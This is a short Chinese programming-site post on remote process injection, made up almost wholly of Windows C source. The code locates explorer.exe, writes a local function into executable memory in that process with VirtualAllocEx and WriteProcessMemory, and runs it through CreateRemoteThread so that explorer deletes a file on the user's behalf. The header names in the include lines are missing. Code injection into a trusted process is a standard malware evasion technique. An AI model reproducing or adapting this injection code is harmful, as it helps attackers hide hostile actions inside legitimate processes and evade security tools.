远程进程注入

类别:编程语言 点击:0 评论:0 推荐:

把自己的代码注入explorer.exe。详细参见源代码

#define UNICODE
#define _UNICODE

#include
#include
#include

typedef struct _remoteparameter
{
 DWORD       rpfindfirstfile;
 DWORD       rpdeletefile;
 DWORD       rpfindclose;  
 
 HANDLE      rpfilehandle;
 WIN32_FIND_DATA rpfdata;
 TCHAR       rptname[MAX_PATH];

}REMOTEPARAMETER, *PREMOTEPARAMETER;

DWORD GetProcessId(LPCTSTR str)
{
    HANDLE         hProcessSnap = NULL; 
    PROCESSENTRY32 pe32      = {0};
 
    //  Take a snapshot of all processes in the system.

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hProcessSnap == (HANDLE)-1)
        return -1;
 
    //  Fill in the size of the structure before using it.

    pe32.dwSize = sizeof(PROCESSENTRY32);
 
    //  Walk the snapshot of the processes, and for each process,
   
    if (Process32First(hProcessSnap, &pe32))
    {
        do
  {
   if(_tcsicmp(str,pe32.szExeFile)==0)
   {
    CloseHandle (hProcessSnap);
    return pe32.th32ProcessID;
   }
  }
        while (Process32Next(hProcessSnap, &pe32)); 
    }
   
    CloseHandle (hProcessSnap);
    return -1;
}

DWORD WINAPI remote(LPVOID pvparam)
{
 PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;

    typedef HANDLE (WINAPI *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
 typedef BOOL   (WINAPI *EDeleteFile)(LPCTSTR);
 typedef BOOL   (WINAPI *EFindClose)(HANDLE);

 EFindFirstFile       tFindFirstFile;
 EDeleteFile          tDeleteFile;
 EFindClose           tFindClose;

 tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
 tDeleteFile=(EDeleteFile)erp->rpdeletefile;
 tFindClose=(EFindClose)erp->rpfindclose;


 
 erp->rpfilehandle=tFindFirstFile(erp->rptname,&erp->rpfdata);
 if(erp->rpfilehandle!=INVALID_HANDLE_VALUE)
 {
  if(!tDeleteFile(erp->rptname))
  {
   return -1;
  }
 }
 if(!tFindClose(erp->rpfilehandle))
 {
  return -1;
 }


 return 0;
}

int main()
{
  // TODO: Place code here.
 TCHAR  name[20];
 _tcscpy(name,_T("c:\\shenyue.txt"));

 HANDLE            ethread;
 DWORD remotepid;
 int cb;
 REMOTEPARAMETER   rp;
 HINSTANCE         hkernel32;
 LPVOID remotethr;
 LPVOID remotepar;

 remotepid=GetProcessId(_T("explorer.exe"));
 if(remotepid==-1)
  return -1;
 HANDLE rphandle=OpenProcess(PROCESS_CREATE_THREAD |    
                         PROCESS_VM_OPERATION  |    
              PROCESS_VM_WRITE,          
           FALSE,remotepid);
 cb=sizeof(TCHAR)*4*1024;
 remotethr=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
 if(remotethr==NULL)
 {
        CloseHandle(rphandle);      
  return -2;
 }
    if(WriteProcessMemory(rphandle,remotethr,(LPVOID)remote,cb,NULL)==FALSE)
 {
        CloseHandle(rphandle);
  return -2;
 }

 {
  memset(&rp,0,sizeof(rp));
  _tcscpy(rp.rptname,name);
  hkernel32=GetModuleHandle(_T("kernel32.dll"));
  rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileW");
  rp.rpdeletefile=(DWORD)GetProcAddress(hkernel32,"DeleteFileW");
  rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
 }

 cb=sizeof(TCHAR)*sizeof(rp);
 remotepar=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
 if(remotepar==NULL)
 {
  CloseHandle(rphandle);
  return -2;
 }

 if(WriteProcessMemory(rphandle,remotepar,(LPVOID)&rp,cb,NULL)==FALSE)
 {
  CloseHandle(rphandle);
  return -2;
 }

 ethread=CreateRemoteThread(rphandle,NULL,0,(LPTHREAD_START_ROUTINE)remotethr,(LPVOID)remotepar,0,NULL);
 if(ethread==NULL)
 {
  CloseHandle(rphandle);
  return -3;
 }

 return 0;
}

本文地址:http://com.8s8s.com/it/it28114.htm